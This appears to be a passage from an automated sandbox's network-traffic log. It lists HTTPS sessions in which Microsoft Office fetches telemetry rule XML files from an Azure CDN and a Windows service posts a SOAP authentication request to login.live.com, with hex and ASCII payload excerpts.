                                                                                                                                                                                                                                                                                                                    Set-Cookie: MS0=1bd8278b928948eea854f3fea80f9326; Domain=.microsoft.com; Expires=Wed, 27 Nov 2024 08:36:56 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                    time-delta-millis: -6158262
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:56 GMT
                                                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    132192.168.2.74991613.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:57 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:57 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:57 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 501
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BACFDAACD"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 42ae9f56-701e-0001-1d37-40b110000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080657Z-174f7845968glpgnhC1EWR7uec0000000wxg0000000001v8
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:57 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    133192.168.2.74991713.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:57 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:57 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:57 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 2592
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB5B890DB"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 8c2ab893-e01e-0003-5391-3f0fa8000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080657Z-174f7845968pf68xhC1EWRr4h80000000wug00000000a53d
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:57 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    134192.168.2.74991813.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:57 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:58 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:58 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 3342
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B927E47E9"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 6eac8613-a01e-006f-3091-3f13cd000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080658Z-174f78459688l8rvhC1EWRtzr0000000095000000000asfb
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:58 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    135192.168.2.74991913.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:58 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:58 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:58 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 2284
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 49e8a97e-c01e-008e-5491-3f7381000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080658Z-174f7845968psccphC1EWRuz9s0000000wug00000000a1d7
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:58 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    136192.168.2.74992013.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:58 UTC191OUTGET /rules/rule90401v3s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:59 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:59 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 1250
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BDE4487AA"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: baa0a071-001e-0082-5b91-3f5880000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080659Z-174f7845968l4kp6hC1EWRe8840000000wzg000000001hvf
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:59 UTC1250INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 39 30 34 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 53 61 6d 70 6c 69 6e 67 50 6f 6c 69 63 79 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 4d 65 74 61 64 61 74 61 22 20 2f 3e 0d
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="90401" V="3" DC="ESM" EN="Office.Telemetry.SamplingPolicy" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" DL="A" DCa="PSP PSU" xmlns=""> <RIS> <RI N="Metadata" />


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    137192.168.2.74992120.231.128.67443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:59 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                                                                    Content-Length: 4775
                                                                                                                                                                                                                                                                                                                    Host: login.live.com
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:59 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:59 UTC568INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                    Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                                                                    Expires: Wed, 27 Nov 2024 08:05:59 GMT
                                                                                                                                                                                                                                                                                                                    P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                    x-ms-route-info: C531_SN1
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 46c468fc-0b2e-47b4-9cf1-599d1950937b
                                                                                                                                                                                                                                                                                                                    PPServer: PPV: 30 H: SN1PEPF0003F967 V: 0
                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:58 GMT
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Content-Length: 1918
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:59 UTC1918INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    138192.168.2.74992213.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:59 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:07:00 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:07:00 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 1393
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: a75c6aaa-401e-002a-4291-3fc62e000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080700Z-174f7845968px8v7hC1EWR08ng0000000wzg000000001wgh
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:07:00 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    139192.168.2.74992313.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:59 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:07:00 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:07:00 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 1356
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BDC681E17"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 003cf3b7-b01e-0053-2e8c-3fcdf8000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080700Z-174f784596886s2bhC1EWR743w0000000wt0000000001gyv
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
